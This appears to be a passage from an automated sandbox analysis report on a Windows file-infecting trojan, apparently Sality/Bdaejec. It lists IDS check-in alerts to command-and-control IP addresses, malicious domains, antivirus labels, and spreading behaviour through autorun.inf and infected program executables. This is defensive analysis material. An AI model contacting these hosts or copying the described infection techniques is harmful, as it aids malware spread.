        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:02.576487
        SID:2804830
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:15.074571
        SID:2804830
        Source Port:49974
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:04.108659
        SID:2804830
        Source Port:49876
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:05.518067
        SID:2804830
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:42.573580
        SID:2804830
        Source Port:49848
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:28.356615
        SID:2804830
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:00.629569
        SID:2804830
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:52.521010
        SID:2804830
        Source Port:49943
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:13.592690
        SID:2804830
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:40.829133
        SID:2804830
        Source Port:49927
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:15.362152
        SID:2804830
        Source Port:49892
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:10.909966
        SID:2804830
        Source Port:49968
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:30.908000
        SID:2804830
        Source Port:49996
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:39.258809
        SID:2804830
        Source Port:49844
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:06.642554
        SID:2804830
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:31.435892
        SID:2804830
        Source Port:49913
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:27.247834
        SID:2804830
        Source Port:49907
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:17.395350
        SID:2804830
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:30.739816
        SID:2804830
        Source Port:49833
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:53.970856
        SID:2804830
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:11.730487
        SID:2804830
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:44.692074
        SID:2804830
        Source Port:50014
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:53.907746
        SID:2804830
        Source Port:50027
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:04.401245
        SID:2804830
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:49.030504
        SID:2804830
        Source Port:50020
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:22.352420
        SID:2804830
        Source Port:49822
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:50.812236
        SID:2804830
        Source Port:50023
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:47.525990
        SID:2804830
        Source Port:49936
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:28.891998
        SID:2804830
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:15.707666
        SID:2804830
        Source Port:49814
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:43.526164
        SID:2804830
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:20.908103
        SID:2804830
        Source Port:49982
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:27.765764
        SID:2804830
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:07.966069
        SID:2804830
        Source Port:49964
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:34.792355
        SID:2804830
        Source Port:49838
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:47.730064
        SID:2804830
        Source Port:49855
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:41.811933
        SID:2804830
        Source Port:49847
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:47.824068
        SID:2804830
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:00:58.522881
        SID:2804830
        Source Port:49707
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:09.128119
        SID:2804830
        Source Port:49805
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:01.719700
        SID:2804830
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:55.485808
        SID:2804830
        Source Port:49865
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:59.328359
        SID:2804830
        Source Port:63854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:14.554537
        SID:2804830
        Source Port:49973
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:56.135964
        SID:2804830
        Source Port:49866
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:48.516871
        SID:2804830
        Source Port:49856
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:07.169793
        SID:2804830
        Source Port:49963
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:53.629266
        SID:2804830
        Source Port:49945
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:04:01.474125
        SID:2804830
        Source Port:49955
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:02:29.271010
        SID:2804830
        Source Port:49831
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:02.055632
        SID:2804830
        Source Port:49874
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:40.865486
        SID:2804830
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:03:37.439073
        SID:2804830
        Source Port:49922
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:07/05/24-08:01:10.581201
        SID:2804830
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        AV Detection

        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Avira: detected
        Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
        Source: www.careerdesk.org Virustotal: Detection: 11%
        Source: ddos.dnsnb8.net Virustotal: Detection: 11%
        Source: apple-pie.in Virustotal: Detection: 13%
        Source: arthur.niria.biz Virustotal: Detection: 10%
        Source: ahmediye.net Virustotal: Detection: 9%
        Source: althawry.org Virustotal: Detection: 11%
        Source: amsamex.com Virustotal: Detection: 8%
        Source: http://www.careerdesk.org/images/xs.jpg Virustotal: Detection: 9%
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe ReversingLabs: Detection: 100%
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe ReversingLabs: Detection: 97%
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Virustotal: Detection: 89%
        Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Joe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Joe Sandbox ML: detected
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdb source: msedge.exe.6.dr
        Source: Binary string: y.pdb source: SearchApp.exe, 0000001F.00000000.1605415996.000001D62E0C2000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\e\src\out\Release_x64\initialexe\msedge.exe.pdbOGP source: msedge.exe.6.dr

        Spreading

        Source: Yara match File source: 6.2.#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe.2420000.7.unpack, type: UNPACKEDPE
        Source: Yara match File source: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe PID: 7248, type: MEMORYSTR
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File created: C:\autorun.inf
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: z:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: y:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: x:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: w:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: v:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: u:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: t:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: s:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: r:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: q:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: p:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: o:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: n:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: m:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: l:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: k:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: j:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: i:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: h:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: g:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: f:
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe File opened: e:
        Source: C:\Windows\System32\RuntimeBroker.exe File opened: c:
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.inf
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: [AutoRun]
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: autorun.inf
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3839049764.000000000458B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: [autorun]
        Source: autorun.inf.6.dr Binary or memory string: [AutoRun]
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0042B020 FindNextFileA,FindClose,FindFirstFileA,FindClose,6_2_0042B020
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0041D290 FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,SendMessageA,6_2_0041D290
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_00433500 FindFirstFileA,FindClose,6_2_00433500
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_004BCF09 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,6_2_004BCF09
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_024257A0 GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,6_2_024257A0
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Code function: 6_2_0242BADD Sleep,lstrcat,lstrcpy,CharLowerA,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,CharUpperA,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,6_2_0242BADD
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B329E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,9_2_00B329E2
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe Code function: 9_2_00B32B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,9_2_00B32B8C
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

        Networking

        Source: Traffic Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.9:64650 -> 1.1.1.1:53
        Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.9:49706 -> 44.221.84.105:799
        Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49707 -> 54.244.188.177:80
        Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49710 -> 44.221.84.105:80
        Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49711 -> 44.221.84.105:80
        Source: Traffic Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.9:49711
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49790 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49791 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49792 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49793 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49794 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49795 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49796 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49797 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49798 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49799 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49800 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49801 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49802 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49803 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49804 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49805 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49806 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49807 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49808 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49809 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49810 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49811 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49812 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49813 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49814 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49815 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49816 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49817 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49818 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49819 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49821 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49822 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49823 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49824 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49825 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49826 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49827 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49828 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49829 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49830 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49831 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49832 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49833 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49834 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49835 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49836 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49837 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49838 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49839 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49840 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49841 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49842 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49843 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49844 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49845 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49846 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49847 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49848 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49849 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49850 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49852 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49853 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49854 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49855 -> 78.46.2.155:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49856 -> 37.230.104.89:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49858 -> 54.244.188.177:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49859 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49860 -> 44.221.84.105:80
        Source: TrafficSnort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.9:49861 -> 78.46.2.155:80
